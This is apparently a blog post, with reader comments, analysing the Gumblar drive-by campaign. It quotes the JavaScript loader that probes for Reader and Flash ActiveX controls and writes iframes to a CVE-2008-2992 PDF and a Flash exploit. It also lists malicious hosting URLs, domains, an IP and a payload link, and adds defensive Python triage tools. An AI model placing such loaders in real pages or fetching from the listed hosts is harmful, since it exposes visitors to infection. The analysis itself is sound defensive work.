Exploits Employed by Gumblar
Gumblar compromises clients using two different exploits. The first is an Adobe Acrobat/Reader PDF exploit, CVE-2008-2992 (the util.printf() stack buffer overflow in Reader 8.1.2 and earlier), and the second is an Adobe Flash exploit. Unfortunately I haven’t been able to figure out which Flash exploit is employed, as decoding Flash is not an expertise of mine.
Here is the Wepawet output for the exploit script employed on each of the hostile domains I mentioned in my previous post.
VirusTotal results for the main exploit script
VirusTotal results for the Flash exploit
VirusTotal results for the PDF exploit
Exploit code is hosted at:
[gumblarserver].cn:8080/
[gumblarserver].cn:8080/cache/flash.swf
[gumblarserver].cn:8080/cache/readme.pdf
The following is the portion of the script that loads the exploits. pdfswf() probes for the Adobe Reader and Flash Player ActiveX controls: constructing an ActiveXObject for a ProgID that is not registered throws, the empty catch swallows the exception, and an iframe pointing at the matching exploit is written only when the plugin is present. Because ActiveXObject exists only in Internet Explorer, this loader does nothing in other browsers. Note that the loop writes the PDF iframe once for every Reader ProgID that instantiates, so a client on which more than one of them is registered fetches readme.pdf more than once.
    function pdfswf()
    {
        // Probe for the Adobe Reader ActiveX controls. ActiveXObject throws
        // when the ProgID is not registered, hence the try/catch around it.
        PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
        for (i in PDF)
        {
            try
            {
                obj = new ActiveXObject(PDF[i]);
                if (obj)
                {
                    // Reader is present: pull in the CVE-2008-2992 PDF.
                    document.write('<iframe src="cache/readme.pdf"></iframe>');
                }
            }
            catch (e) {}
        }
        // Same check for Flash Player, then pull in the Flash exploit.
        try
        {
            obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
            if (obj)
            {
                document.write('<iframe src="cache/flash.swf"></iframe>');
            }
        }
        catch (e) {}
    }
    pdfswf();
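As an added example (this is not code from the post or from the Gumblar script), the following Python triage helper recovers the same plugin-to-payload mapping from a captured loader: it resolves the new Array(...) string table, finds every try block that instantiates an ActiveXObject, and pairs the ProgIDs probed there with the iframe src written on success. The sample input is the loader quoted above; the regexes, function names and ProgID descriptions are my own choices, and the ProgID list is not exhaustive.

```python
"""Triage helper for plugin-probing loaders of the Gumblar kind.

Added example, not code from the post or from the Gumblar script. Resolves
`new Array(...)` string tables, finds every `try { ... }` block that
instantiates an ActiveXObject, and pairs the probed ProgIDs with the
iframe src written on success. Regexes and names are my own choices.
"""
import re

# Sample input: the loader quoted on this page, with straight quotes.
SAMPLE_LOADER = r'''
function pdfswf()
{
    PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
    for (i in PDF)
    {
        try
        {
            obj = new ActiveXObject(PDF[i]);
            if (obj)
            {
                document.write('<iframe src="cache/readme.pdf"></iframe>');
            }
        }
        catch (e) {}
    }
    try
    {
        obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
        if (obj)
        {
            document.write('<iframe src="cache/flash.swf"></iframe>');
        }
    }
    catch (e) {}
}
pdfswf();
'''

# For reporting only; assumption: not an exhaustive ProgID list.
PROGID_NAMES = {
    "AcroPDF.PDF": "Adobe Reader",
    "PDF.PdfCtrl": "Adobe Reader (older control)",
    "ShockwaveFlash.ShockwaveFlash": "Adobe Flash Player",
}

STRING_RE = re.compile(r'''["']([^"']*)["']''')
ARRAY_DEF_RE = re.compile(r'(\w+)\s*=\s*new\s+Array\s*\(([^)]*)\)')
ACTIVEX_RE = re.compile(r'new\s+ActiveXObject\s*\(\s*([^)]*?)\s*\)')
IFRAME_RE = re.compile(
    r'''document\.write\s*\(\s*["']\s*<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'>\s]+)''',
    re.IGNORECASE)

def string_arrays(script):
    """Map array variable name -> the string literals it was built from."""
    return {name: STRING_RE.findall(body)
            for name, body in ARRAY_DEF_RE.findall(script)}

def try_blocks(script):
    """Yield the body of every `try { ... }` block, matching nested braces."""
    for m in re.finditer(r'\btry\s*\{', script):
        depth, i = 1, m.end()
        while i < len(script) and depth:
            if script[i] == '{':
                depth += 1
            elif script[i] == '}':
                depth -= 1
            i += 1
        yield script[m.end():i - 1]

def resolve_progids(arg, arrays):
    """ProgID strings an ActiveXObject argument can take: a literal, or an
    indexed array variable such as PDF[i]; anything else is left unresolved."""
    lit = STRING_RE.fullmatch(arg)
    if lit:
        return [lit.group(1)]
    indexed = re.match(r'(\w+)\s*\[', arg)
    if indexed and indexed.group(1) in arrays:
        return list(arrays[indexed.group(1)])
    return ['<unresolved: %s>' % arg]

def analyze(script):
    """[(probed_progids, iframe_srcs)] for each try block that probes a plugin."""
    arrays = string_arrays(script)
    findings = []
    for body in try_blocks(script):
        progids = []
        for arg in ACTIVEX_RE.findall(body):
            progids.extend(resolve_progids(arg, arrays))
        if progids:
            findings.append((progids, IFRAME_RE.findall(body)))
    return findings

def report(script):
    """One line per probe: which plugin gates which payload."""
    lines = []
    for progids, srcs in analyze(script):
        names = ', '.join('%s (%s)' % (p, PROGID_NAMES.get(p, 'unknown')) for p in progids)
        lines.append('probes %s -> loads %s' % (names, ', '.join(srcs) or 'nothing'))
    return lines

if __name__ == '__main__':
    print('\n'.join(report(SAMPLE_LOADER)))
```

Run against the sample it reports two probes, the Reader pair gating readme.pdf and the Flash control gating flash.swf. Obfuscated loaders usually hide the ProgIDs behind string concatenation or an eval stage, so this is a post-decoding tool: run it on the Wepawet deobfuscated output, not on the raw page.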
On an interesting note, the directory in which the malware author appears to have built the Flash file is embedded in the movie itself; authoring tools commonly leave such build paths behind, and they are a handy pivot when clustering samples. The strings were recovered with: swfdump -atpdu flash.swf
-=> 65 72 47 43 3a 5c 44 6f 63 75 6d 65 6e 74 73 20 erGC:\Documents
-=> 61 6e 64 20 53 65 74 74 69 6e 67 73 5c 64 65 76 and Settings\dev
-=> 5c 44 65 73 6b 74 6f 70 5c 65 78 70 3b 3b 48 51 \Desktop\exp;;HQ
C:\Documents and Settings\dev\Desktop\exp
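The same recovery without swftools, as an added example that is not part of the original post: a small Python reader for the SWF container (the public header layout is the signature "FWS" or "CWS", a version byte and a little-endian uncompressed length, followed for CWS by a zlib stream) that inflates the body and pulls out printable strings and Windows drive paths. The LZMA "ZWS" form used by newer players is deliberately left unsupported. The Gumblar flash.swf is not reproduced here; the fixture the script builds is constructed for the demo and only carries the path string from the swfdump output above.

```python
"""Pull embedded strings and build paths out of an SWF without swftools.

Added example, not from the original post. Only the SWF container is
parsed: 8-byte header (signature "FWS"/"CWS", version, little-endian
total length) then a zlib stream for CWS. The LZMA "ZWS" variant is
deliberately unsupported. The sample SWF below is constructed for the
demo; it is not the Gumblar flash.swf.
"""
import re
import struct
import zlib

SWF_HEADER = struct.Struct('<3sBI')            # signature, version, total length
PRINTABLE_RE = re.compile(rb'[\x20-\x7e]{6,}')
# Drive letter, colon, backslash, then bytes up to one that cannot appear in
# a Windows path (NUL, quote, angle brackets, pipe) or a ';' separator.
WIN_PATH_RE = re.compile(rb'[A-Za-z]:\\[^\x00"<>|;]+')

def swf_body(data):
    """Return the decompressed SWF body (everything after the 8-byte header)."""
    if len(data) < SWF_HEADER.size:
        raise ValueError('too short to be an SWF')
    sig, _version, length = SWF_HEADER.unpack_from(data, 0)
    if sig == b'FWS':
        body = data[SWF_HEADER.size:]
    elif sig == b'CWS':
        body = zlib.decompress(data[SWF_HEADER.size:])
    elif sig == b'ZWS':
        raise ValueError('LZMA-compressed SWF (ZWS) is not supported by this example')
    else:
        raise ValueError('not an SWF: signature %r' % sig)
    if len(body) + SWF_HEADER.size != length:
        # A header length that disagrees with the real size is common in
        # hand-edited or truncated malware samples; surface it, do not hide it.
        raise ValueError('length mismatch: header says %d, file has %d'
                         % (length, len(body) + SWF_HEADER.size))
    return body

def printable_strings(body):
    """All runs of 6+ printable ASCII bytes, like `strings` on the inflated body."""
    return [m.group().decode('ascii') for m in PRINTABLE_RE.finditer(body)]

def windows_paths(body):
    """Just the Windows drive paths, e.g. the author's build directory."""
    return [m.group().decode('ascii') for m in WIN_PATH_RE.finditer(body)]

def build_sample_swf(embedded, compressed=True):
    """Construct a minimal SWF carrying `embedded` (a fixture for the demo, not
    a playable movie): empty RECT, 12 fps, 1 frame, the bytes, then an End tag."""
    body = (b'\x00' + struct.pack('<HH', 12 << 8, 1)
            + b'erG' + embedded + b';;HQ' + b'\x00\x00')
    length = SWF_HEADER.size + len(body)
    if compressed:
        return SWF_HEADER.pack(b'CWS', 9, length) + zlib.compress(body)
    return SWF_HEADER.pack(b'FWS', 9, length) + body

BUILD_PATH = b'C:\\Documents and Settings\\dev\\Desktop\\exp'   # from the swfdump output

if __name__ == '__main__':
    body = swf_body(build_sample_swf(BUILD_PATH))
    print('strings:', printable_strings(body))
    print('paths  :', windows_paths(body))
```

On the constructed fixture the path regex returns C:\Documents and Settings\dev\Desktop\exp, stopping at the ";;HQ" that follows it in the dump, while the plain strings pass returns the whole printable run including the "erG" prefix. On a real sample replace the fixture with open('flash.swf', 'rb').read().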
More Gumblar domains are hosted on 70.85.142.250.
I haven’t checked all of them, but these are the domains I suspect are involved:
casinoslotbet.cn
bigbestfind.cn
autobestwestern.cn
findbigbrother.cn
finditbig.cn
giantbeaversdiet.cn
giantnonfat.cn
greatbethere.cn
tvnameshop.cn
My personal favorite would have to be giantbeaversdiet.cn, which hosts the binary payload that starts the chain of infection described in the previous post (hxxp://giantbeaversdiet.cn:8080/landig.php?id=8).
Who comes up with these domain names anyway??

These are similar to websites I investigated after seeing a Craigslist ad for help cleaning websites (blog comment malframes). I ran these through Wepawet on April 24…
litecarfinestsite.cn
liteautomobileinsurance.cn
bigfirststopnonfat.cn
liteupyourride.cn
They dropped swf/pdf files, ran ActiveX PDF attacks, and dropped a Windows PE at the end… Anubis found it added digiwet.dll to the system… I believe I saw this same file in the Gumblar analysis.
Thanks for the interesting analysis.
Hi Andrew,
I too came across a similar malware, but I am stuck at one point in the Wepawet analysis.
In the segment “var Kkbfhqas=”, what is the decoded output of the variable? I had read somewhere that this is the “shellcode”, but I am not able to figure that out myself. Any inputs on this, or on how I can better understand this segment?
Thanks